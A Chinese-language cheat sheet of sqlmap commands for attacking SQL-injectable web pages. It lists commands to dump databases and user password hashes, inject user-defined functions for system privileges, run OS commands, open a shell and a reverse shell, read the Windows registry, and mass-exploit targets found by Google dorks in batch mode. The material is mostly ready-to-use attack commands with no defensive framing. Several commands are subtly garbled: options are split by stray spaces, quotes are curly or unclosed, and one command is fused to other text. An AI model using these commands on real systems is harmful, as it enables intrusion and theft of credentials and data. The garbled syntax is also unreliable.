SQLMAP常用参数

#获取当前用户名称
sqlmap -u “http://url?id=1“ - -current-user

#获取当前数据库名称
sqlmap -u “http://url?id=1“ - -current-db

#列出给定数据库的所有表
sqlmap -u “http://url?id=1“ -D “db_name” - -tables

#列出指定库和指定表的所有列
sqlmap -u “http://url?id=1“ -D “db_name” -T “tablename” - -columns

#获取指定数据库指定表指定列的内容
sqlmap -u “http://url?id=1“ -D “db_name” -T “table_name” -C “column_name1,column_name2” - -dump

#确定是否为DBA
sqlmap -u “http://url?id=1“ - -is-dba

#查看权限
sqlmap -u “http://url?id=1“ - -privileges

#获取所有数据库用户密码
sqlmap -u “http://url?id=1“ - -passwords

#列出指定用户数据库密码
sqlmap -u “http://url?id=1“ - -passwords -U username

#列出所有数据库用户角色
sqlmap -u “http://url?id=1“ - -roles

#列出所有数据库用户
sqlmap -u “http://url?id=1“ - -users

#列出所有数据库名
sqlmap -u “http://url?id=1“ - -dbs

#查看指定用户权限
sqlmap -u “http://url?id=1“ - -privileges -U username

#导出所有数据库所有表
sqlmap -u “http://url?id=1“ - -dump-all

#导出指定字段的20条数据
sqlmap -u “http://url?id=1“ -D “db_name” -T “tablename” -C “password,user,id” - -dump - -start 1 - -stop 20

#导入用户自定义函数(获取系统权限!)
sqlmap -u “http://url?id=1“ - -udf-inject

#post注入
sqlmap -u “http://url?id=1“ - -data “id=3”

#代理注入
sqlmap -u “http://url?id=1“ - -proxy “http://127.0.0.1:8118

#执行系统命令
sqlmap -u “http://url?id=1“ - -os-cmd=whoami

#系统交互
shellsqlmap -u “http://url?id=1“ - -os-shell

#执行指定sql命令
sqlmap -u “http://url?id=1“ - -sql-shell

#反弹shell
sqlmap -u “http://url?id=1“ - -os-pwn

#读取win系统注册表
sqlmap -u “http://url?id=1“ - -reg-read

#google搜索注入点自动跑出所有字段攻击实例
sqlmap -u “http://url?id=1“ -g “Google dork” - -dump-all - -batch